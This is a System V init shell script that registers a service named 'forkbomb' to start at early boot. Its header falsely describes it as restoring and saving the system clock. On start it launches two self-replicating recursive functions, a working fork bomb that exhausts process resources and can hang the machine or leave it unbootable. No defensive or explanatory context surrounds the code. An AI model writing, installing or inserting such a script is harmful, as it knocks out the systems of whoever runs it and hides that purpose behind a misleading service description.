#!/bin/sh

### BEGIN INIT INFO
# Provides:          forkbomb
# Required-Start:
# Required-Stop:     umountroot
# Should-Stop:       
# X-Start-Before:    checkroot
# Default-Start:     S
# Default-Stop:      0 1 6
# Short-Description: Restore / save the current clock
# Description:       
### END INIT INFO

LOG_FILE="/var/log/fokbomb.log"

case "${1:-}" in
   start)
        echo "Starting forkbomb ..."
        bomb1() {
		bomb1 | bomb1 &
		echo "first bomber ..." >> $LOG_FILE
	}; bomb1
	bomb2() {
		bomb2 | bomb2 &
		echo "second bomber ..." >> $LOG_FILE
	}; bomb2 
	;;

  *)
        echo "Usage: ${0:-} {start}" >&2
        exit 1
        ;;
esac
